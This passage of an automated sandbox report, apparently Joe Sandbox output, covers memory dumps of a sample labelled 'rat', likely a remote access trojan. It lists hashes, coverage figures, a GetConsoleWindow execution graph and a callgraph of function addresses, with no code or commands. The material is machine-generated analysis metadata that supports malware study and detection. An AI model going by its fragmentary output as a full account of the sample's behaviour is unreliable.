                                                                                                    • Snapshot File: hcaresult_10_2_7ffd34880000_rat.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2863861424-0
                                                                                                    • Opcode ID: 793d599799509c748e44b7e33acbcc7d318d123cb43b220215940efacc960d2d
                                                                                                    • Instruction ID: 7621c20150974c66ab734b8b4c067e047a8fb72cdd00564d5fc3af6a38d8f1c0
                                                                                                    • Opcode Fuzzy Hash: 793d599799509c748e44b7e33acbcc7d318d123cb43b220215940efacc960d2d
                                                                                                    • Instruction Fuzzy Hash: 1B21A77190CB4C8FDB69DB98D845AE97BF0FF66320F00412FD089D3552DA756845CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2172614485.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ffd34880000_rat.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 15178c14e2838b3bba7c0cc874fe9216443f8d55e849a531992a70b7856ea9d2
                                                                                                    • Instruction ID: 8a99b2660e35a24937caa331ad868abeef282f724b89f8953b1db51f02172c5d
                                                                                                    • Opcode Fuzzy Hash: 15178c14e2838b3bba7c0cc874fe9216443f8d55e849a531992a70b7856ea9d2
                                                                                                    • Instruction Fuzzy Hash: C361834090EAC56FD762D3F919B29AABFE08F07241B2C4AEAD4C5DB1D3D85C641AD312
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:12.8%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:3
                                                                                                    Total number of Limit Nodes:0
                                                                                                    execution_graph 1100 7ffd348a1c15 1101 7ffd348a1c2f GetConsoleWindow 1100->1101 1103 7ffd348a1cae 1101->1103

                                                                                                    Callgraph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    • Opacity -> Relevance
                                                                                                    • Disassembly available
                                                                                                    callgraph 0 Function_00007FFD348A1C76 1 Function_00007FFD348A1DF5 2 Function_00007FFD348A1E75 3 Function_00007FFD348A04F8 4 Function_00007FFD348A0578 5 Function_00007FFD348A11F7 6 Function_00007FFD348A1DFC 23 Function_00007FFD348A0B18 6->23 24 Function_00007FFD348A0998 6->24 7 Function_00007FFD348A026D 8 Function_00007FFD348A16EF 9 Function_00007FFD348A0C71 10 Function_00007FFD348A1A73 11 Function_00007FFD348A1A66 12 Function_00007FFD348A0668 13 Function_00007FFD348A05E8 14 Function_00007FFD348A2669 15 Function_00007FFD348A1EEB 44 Function_00007FFD348A1FB9 15->44 16 Function_00007FFD348A02DD 17 Function_00007FFD348A025D 18 Function_00007FFD348A20DD 19 Function_00007FFD348A20E2 20 Function_00007FFD348A1C15 21 Function_00007FFD348A2318 22 Function_00007FFD348A0618 25 Function_00007FFD348A038D 26 Function_00007FFD348A030D 27 Function_00007FFD348A218D 28 Function_00007FFD348A0810 29 Function_00007FFD348A0291 30 Function_00007FFD348A1D91 31 Function_00007FFD348A2005 54 Function_00007FFD348A20A1 31->54 32 Function_00007FFD348A1688 33 Function_00007FFD348A0608 34 Function_00007FFD348A000A 35 Function_00007FFD348A1B89 65 Function_00007FFD348A0850 35->65 36 Function_00007FFD348A03FD 37 Function_00007FFD348A0281 38 Function_00007FFD348A2784 39 Function_00007FFD348A0D04 39->0 39->8 43 Function_00007FFD348A14B9 39->43 48 Function_00007FFD348A1925 39->48 51 Function_00007FFD348A139E 39->51 64 Function_00007FFD348A104D 39->64 67 Function_00007FFD348A15D4 39->67 74 Function_00007FFD348A1A40 39->74 40 Function_00007FFD348A1C04 40->3 41 Function_00007FFD348A01B8 42 Function_00007FFD348A0638 45 Function_00007FFD348A012D 46 Function_00007FFD348A00AD 47 Function_00007FFD348A2433 49 Function_00007FFD348A1AA9 49->4 49->13 49->22 49->33 49->42 59 Function_00007FFD348A05D8 49->59 60 Function_00007FFD348A0658 49->60 68 Function_00007FFD348A0648 49->68 69 Function_00007FFD348A0A48 49->69 50 Function_00007FFD348A1EAC 50->44 52 Function_00007FFD348A029D 53 Function_00007FFD348A289F 55 Function_00007FFD348A1CD8 56 Function_00007FFD348A03D8 57 Function_00007FFD348A0558 58 Function_00007FFD348A12D8 61 Function_00007FFD348A2158 62 Function_00007FFD348A13D9 63 Function_00007FFD348A014D 64->14 64->19 64->38 64->53 70 Function_00007FFD348A1FC7 64->70 66 Function_00007FFD348A1552 71 Function_00007FFD348A03BD 72 Function_00007FFD348A033D 73 Function_00007FFD348A02BD 75 Function_00007FFD348A0FC0 75->14 75->19 75->30 75->38 75->50 75->53 75->70

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 7ffd348a1c15-7ffd348a1cac GetConsoleWindow 4 7ffd348a1cae 0->4 5 7ffd348a1cb4-7ffd348a1cd0 0->5 4->5
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2093426005.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_7ffd348a0000_rat.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2863861424-0
                                                                                                    • Opcode ID: 7f9b64b9001d00bcd194145ffc7ff94347794667de27398c300a56265d5a86bb
                                                                                                    • Instruction ID: 327e083b75a78f541f630e18090b9b44774fa9cb093fcfe8e755e91353aa3e3e
                                                                                                    • Opcode Fuzzy Hash: 7f9b64b9001d00bcd194145ffc7ff94347794667de27398c300a56265d5a86bb
                                                                                                    • Instruction Fuzzy Hash: 4B21837190CB4C8FDB69DB98D845AE9BBF0EF56320F00412FD049D3552DA746446CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%